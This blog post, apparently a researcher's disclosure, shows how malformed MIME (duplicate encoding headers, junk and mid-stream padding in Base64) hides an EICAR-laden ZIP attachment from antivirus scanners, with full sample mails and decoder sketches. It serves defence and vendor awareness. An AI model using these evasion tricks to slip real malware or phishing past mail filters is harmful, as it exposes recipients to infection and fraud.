Traditionally mails were ASCII-only and limited to 1000 characters per line. The MIME standard defines a way to structure a mail (multiple parts, including attachments) and to transport non-ASCII data. Unfortunately, the standard is unnecessarily complex and flexible, makes contradicting definitions possible and defines no real error handling.
The result of this is that different implementations interpret edge-cases of valid MIME or purposely invalid MIME in different ways. This includes the interpretation in analysis systems like mail filters, IDS/IPS, mail gateways or antivirus, which often interpret specifically prepared mails differently to the end-user system.
This post shows how easy it is to modify a mail with a malicious attachment in a few simple steps, so that at the end no antivirus at Virustotal will be able to properly extract the attachment from the mail and detect the malware. After all this modification it is still possible to open the mail in Thunderbird and access the malicious payload without problems.
None of this is really new. I've published similar problems before in 11/2014 and various posts in 07/2015 and also showed how this can be used to bypass proper checking of DKIM signatures. And there is also much older research like this from 2008.
But the analysis systems are still broken and the vendors either are not aware of these issues or keep quiet about these problems. Therefore it might be useful to show again how trivially such analysis can be bypassed, in the hope that at least some vendors wake up and fix their products. In the following I demonstrate how to hide a malicious attachment from proper analysis in a few simple and easy to follow steps.
We start with a mail containing the innocent EICAR test virus inside a ZIP archive. The mail consists of two MIME parts, the first one being some text and the second one the attachment, encoded with Base64 in order to translate the binary attachment into ASCII for transport. As of today (2018/07/05) 36 (of 59) products at Virustotal are able to detect the malicious payload. The rest are probably not able or not configured to deal with mail files or malware in ZIP archives.
From: firstname.lastname@example.org
To: email@example.com
Subject: plain
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64

UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
We can verify the contents of the mail for example by saving the file with extension .eml and opening it with Thunderbird. It should show an attached ZIP archive named whatever.zip, containing the EICAR test virus.
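The same check can also be scripted. The following is only a minimal sketch, assuming Python's standard `email` module as the parser; the helper name `list_attachments` is made up for this illustration. It lists the attachment name and looks at the first bytes of the decoded payload, which for a ZIP archive should be the `PK\x03\x04` signature.

```python
import email

# The unmodified sample mail from above.
RAW_MAIL = """\
From: firstname.lastname@example.org
To: email@example.com
Subject: plain
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64

UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
"""


def list_attachments(raw):
    """Return (filename, decoded bytes) for every named leaf part (hypothetical helper)."""
    msg = email.message_from_string(raw)
    found = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue  # container part, carries no payload of its own
        name = part.get_filename()  # falls back to the name= parameter of Content-type
        if name:
            found.append((name, part.get_payload(decode=True)))
    return found


attachments = list_attachments(RAW_MAIL)
for name, data in attachments:
    # A ZIP archive starts with the local file header signature PK\x03\x04.
    print(name, data[:4], b"eicar.com" in data)
```

This only shows how one particular parser sees the mail. The point of the following steps is that other parsers may see something different.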
First we use the same trick which worked in 2015 against AOL Mail: we just add a second, different Content-Transfer-Encoding header, thus making contradicting statements about how the content is encoded. Most mail clients (including Thunderbird and Outlook) will use the first header and ignore the second, so they interpret the following mail no differently from the original one. Still, even though the problem should have been known for at least 3 years, the detection rate at Virustotal goes down from 36 to 28:
From: firstname.lastname@example.org
To: email@example.com
Subject: contradicting Content-Transfer-Encoding
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR
CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU
AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
--foo--
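An analysis system could at least notice such a contradiction instead of silently picking one header. The following is a minimal sketch of that idea, assuming Python's standard `email` module; the helper names `cte_headers` and `has_contradicting_cte` are hypothetical, and this is not how any particular product works.

```python
import email

# Headers of the attachment part from the mail above, with a shortened body.
RAW_PART = """\
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

UEsDBBQA
"""


def cte_headers(raw_part):
    """Return every Content-Transfer-Encoding value of a part, not just one."""
    part = email.message_from_string(raw_part)
    return part.get_all("Content-Transfer-Encoding", [])


def has_contradicting_cte(raw_part):
    """True if the part declares more than one distinct transfer encoding."""
    values = {value.strip().lower() for value in cte_headers(raw_part)}
    return len(values) > 1


print(cte_headers(RAW_PART))
print(has_contradicting_cte(RAW_PART))
```

What to do with a flagged mail (reject it, or analyze the content under every declared encoding) is a policy decision that this sketch leaves open.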
The alphabet used in Base64 consists of 64 clearly defined characters, with maybe some '=' at the end. Newline is used to break the encoding into separate lines and should be ignored. But it is not fully clear how an occurrence of any other (junk) characters should be handled. The standard suggests, without strictly defining it, that these characters be ignored even though they should not happen in the first place - and this is what almost all implementations actually do. From RFC 2045, section 6.8:
The encoded output stream must be represented in lines of no more than 76 characters each. All line breaks or other characters not found in Table 1 must be ignored by decoding software. In base64 data, characters other than those in Table 1, line breaks, and other white space probably indicate a transmission error, about which a warning message or even a message rejection might be appropriate under some circumstances.
Based on this we insert lots of junk data into the Base64 encoding and end up with a mail which gets flagged as containing malware by only 17 of the original 36 antivirus products:
From: firstname.lastname@example.org
To: email@example.com
Subject: junk characters inside Base64 combined with contradicting CTE
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

U.E.s.D.B.B.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q.
A.A.A.A.J.A.A.A.A.Z.W.l.j.Y.X.I.u.Y.2.9.t.i.z.D.1.V.w.x.Q.d.X.
A.M.i.D.a.J.C.Y.i.K.M.D.X.R.C.I.j.T.N.H.d.2.1.
j.S.v.V.X.H.1.d.H.Y.M.0.g.0.O.c.f
.R.z.c.Q.x.y.0.X.X.0.C./.E.M.8.w.w.K.D.d.Y.N.c.Q.0.O.0.X.X.z.
9.H.F.V.V.P.H.Q.9.t.A.C.A.F.B.L.A.Q.I.U.
A.x.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q
.A.A.A.A.J.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.2.g.Q.A.A.A.A.B.l.a.
W.N.h.c.i.5.j.b.2.1.Q.S.w.U.G.A.A.A.A.
A.A.E.A.A.Q.A.3.A.A.A.A.b.Q.A.A.A.A.A.A.
--foo--
Note that this does not mean that all the affected products cannot deal with junk characters inside Base64. It is more likely that most of these products already failed to determine the correct Content-Transfer-Encoding in step 2, but employed a heuristic to detect Base64 encoding no matter where it is. Adding junk characters made this heuristic fail.
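The difference between a lenient and a strict decoder can be illustrated in a few lines. This is a minimal sketch, assuming Python's standard `base64` module as a stand-in for a decoder; the helper names `add_junk`, `decode_lenient` and `decode_strict` are made up for this example. With its default settings `base64.b64decode` discards characters outside the alphabet, while `validate=True` rejects them.

```python
import base64
import binascii


def add_junk(encoded, junk=b"."):
    """Insert a junk character between all Base64 characters (hypothetical helper)."""
    return junk.join(encoded[i:i + 1] for i in range(len(encoded)))


def decode_lenient(encoded):
    """Decode while silently dropping characters outside the Base64 alphabet."""
    return base64.b64decode(encoded)  # validate=False is the default


def decode_strict(encoded):
    """Decode, but return None if any non-alphabet character is present."""
    try:
        return base64.b64decode(encoded, validate=True)
    except binascii.Error:
        return None


clean = b"UEsDBBQA"            # first 8 characters of the sample attachment
dirty = add_junk(clean)        # b"U.E.s.D.B.B.Q.A"

print(dirty)
print(decode_lenient(dirty))   # same bytes as decoding the clean input
print(decode_strict(dirty))    # None, the strict decoder refuses the input
```

A mail client behaving like the lenient decoder and an analysis system behaving like the strict one (or like a heuristic that expects clean Base64) will disagree about what the attachment contains.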
In this step we go back a bit and no longer use junk characters. Instead we attack the Base64 encoding in a different way: A proper encoding would always take 3 input characters and encode these to 4 output characters. If at the end only one or two input characters are left the output will still be 4 characters, either padded with '==' (one input character) or '=' (two input characters).
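The padding rule is easy to see with three short inputs. A small sketch using Python's standard `base64` module (the helper name `padding_examples` is only for illustration):

```python
import base64


def padding_examples():
    """Encode inputs of 3, 2 and 1 bytes to show the resulting padding."""
    return [base64.b64encode(data) for data in (b"abc", b"ab", b"a")]


for encoded in padding_examples():
    # Every result is exactly 4 characters long.
    print(encoded, len(encoded))
```

Three input bytes need no padding (`YWJj`), two bytes get a single `=` (`YWI=`) and one byte gets `==` (`YQ==`).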
This means that a '=' or '==' should only be at the end of the encoded data. Because of this some decoders will stop at the first '='. Others don't care. For example Thunderbird always reads 4 bytes of encoded data and decodes these, and it does not treat '=' differently for encoded data in the middle vs. encoded data at the end. This leads to the idea of not always encoding 3 characters at once but only 2 characters at once, leaving lots of '=' inside the encoded data. Thunderbird will handle this mail the same as the original mail, but the detection rate at Virustotal goes down from 36 to a single vendor:
From: firstname.lastname@example.org
To: email@example.com
Subject: Base64 encoded in small chunks instead one piece + contradicting CTE
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

UEs=AwQ=FAA=AgA=CAA=EUo=jkk=PM8=UWg=RgA=AAA=RAA=AAA=CQA=AAA=ZWk=Y2E=ci4=
Y28=bYs=MPU=Vww=UHU=cAw=iDY=iQk=iIo=MDU=0Qg=iNM=NHc=dtY=NK8=VXE=9XQ=dgw=
0g0=DnE=9HM=cQw=ctE=dfQ=C/E=DPM=DAo=DdY=DXE=DQ4=0XU=8/Q=cVU=VPE=0PY=0AI=
AFA=SwE=AhQ=AxQ=AAI=AAg=ABE=So4=STw=z1E=aEY=AAA=AEQ=AAA=AAk=AAA=AAA=AAA=
AAA=AAA=ALY=gQA=AAA=AGU=aWM=YXI=LmM=b20=UEs=BQY=AAA=AAA=AQA=AQA=NwA=AAA=
bQA=AAA=AAA=
--foo--
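The chunked encoding and the two decoder behaviours described above can be sketched as follows. This is an illustration only: `encode_in_chunks`, `decode_groupwise` and `decode_until_padding` are hypothetical helpers written for this example. The group-wise decoder mimics the behaviour described for Thunderbird (every 4 characters decoded on their own), and it assumes the input length is a multiple of 4 once whitespace is removed.

```python
import base64


def encode_in_chunks(data, chunk_size=2):
    """Base64-encode every chunk separately, so each 2-byte chunk ends in '='."""
    return b"".join(
        base64.b64encode(data[i:i + chunk_size])
        for i in range(0, len(data), chunk_size)
    )


def decode_groupwise(encoded):
    """Decode each group of 4 characters independently, wherever '=' occurs."""
    compact = b"".join(encoded.split())  # drop line breaks and spaces
    return b"".join(
        base64.b64decode(compact[i:i + 4])
        for i in range(0, len(compact), 4)
    )


def decode_until_padding(encoded):
    """Decode only up to and including the first padded group, then stop."""
    compact = b"".join(encoded.split())
    pos = compact.find(b"=")
    if pos != -1:
        compact = compact[:(pos // 4 + 1) * 4]
    return base64.b64decode(compact)


payload = b"PK\x03\x04\x14\x00"          # first bytes of the ZIP archive
chunked = encode_in_chunks(payload)

print(chunked)                           # starts like the mail above: UEs=AwQ=FAA=
print(decode_groupwise(chunked))         # full payload recovered
print(decode_until_padding(chunked))     # only the first two bytes
```

A decoder of the second kind sees just `PK` and nothing that looks like a complete archive, while the recipient's mail client recovers the whole attachment.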
In order to confuse even the last remaining product we again add the junk characters from step 3. This successfully brings down the detection rate from 36 to zero:
From: firstname.lastname@example.org
To: email@example.com
Subject: chunked Base64 combined with junk characters and contradicting CTE
Content-type: multipart/mixed; boundary=foo

--foo
Content-type: text/plain

Virus attached

--foo
Content-type: application/zip; name=whatever.zip
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

UEs=.AwQ=.FAA=.AgA=.CAA=.EUo=.jkk=.PM8=.UWg=.RgA=.AAA=.RAA=.AAA=.CQA=.AAA=.
ZWk=.Y2E=.ci4=.Y28=.bYs=.MPU=.Vww=.UHU=.cAw=.iDY=.iQk=.iIo=.MDU=.0Qg=.iNM=.
NHc=.dtY=.NK8=.VXE=.9XQ=.dgw=.0g0=.DnE=.9HM=.cQw=.ctE=.dfQ=.C/E=.DPM=.DAo=.
DdY=.DXE=.DQ4=.0XU=.8/Q=.cVU=.VPE=.0PY=.0AI=.AFA=.SwE=.AhQ=.AxQ=.AAI=.AAg=.
ABE=.So4=.STw=.z1E=.aEY=.AAA=.AEQ=.AAA=.AAk=.AAA=.AAA=.AAA=.AAA=.AAA=.ALY=.
gQA=.AAA=.AGU=.aWM=.YXI=.LmM=.b20=.UEs=.BQY=.AAA=.AAA=.AQA=.AQA=.NwA=.AAA=.
bQA=.AAA=.AAA=.
--foo--
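To get the payload back out of this final form, a decoder has to tolerate both tricks at once. The sketch below is one possible way to do that and not a description of any real mail client: the hypothetical helper `decode_tolerant` first drops every character outside the Base64 alphabet and '=', then decodes each group of 4 characters on its own. It is applied to the first Base64 line of the mail above.

```python
import base64
import re

# Anything that is neither a Base64 character nor '=' counts as junk here.
NOT_BASE64 = re.compile(rb"[^A-Za-z0-9+/=]")


def decode_tolerant(encoded):
    """Strip junk characters, then decode every 4-character group separately."""
    cleaned = NOT_BASE64.sub(b"", encoded)
    return b"".join(
        base64.b64decode(cleaned[i:i + 4])
        for i in range(0, len(cleaned), 4)
    )


# First Base64 line of the mail above.
FIRST_LINE = (
    b"UEs=.AwQ=.FAA=.AgA=.CAA=.EUo=.jkk=.PM8=.UWg=.RgA=."
    b"AAA=.RAA=.AAA=.CQA=.AAA=."
)

header = decode_tolerant(FIRST_LINE)
print(len(header), header[:4])   # 15 groups of 2 bytes, starting with the ZIP signature
```

An analysis system that wants to see what the recipient sees would need to be at least this tolerant, or else treat such input as suspicious in the first place.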
Why adapt the malware if we can just adjust the transport of the malware to make even widely known malware undetectable? This works by making use of different implementations of the MIME standard, which leads to different interpretations of unusual or invalid data, effectively making the analysis system blind to the true meaning of the data.
Note that this post is only a small insight into what can be done. I've found many more bypasses, both for content analysis and for extracting the proper filename from the attachment (in order to block .exe, .scr etc). The situation with MIME is about as bad as I described for HTTP.
And, these methods are not restricted to fooling malware analysis. By applying these methods to the text content displayed to the user, they can also be used to fool phishing and spam detection. For example they can be used to make the analysis see gibberish or make it analyze the wrong MIME part, but have the mail displayed as intended for the end user.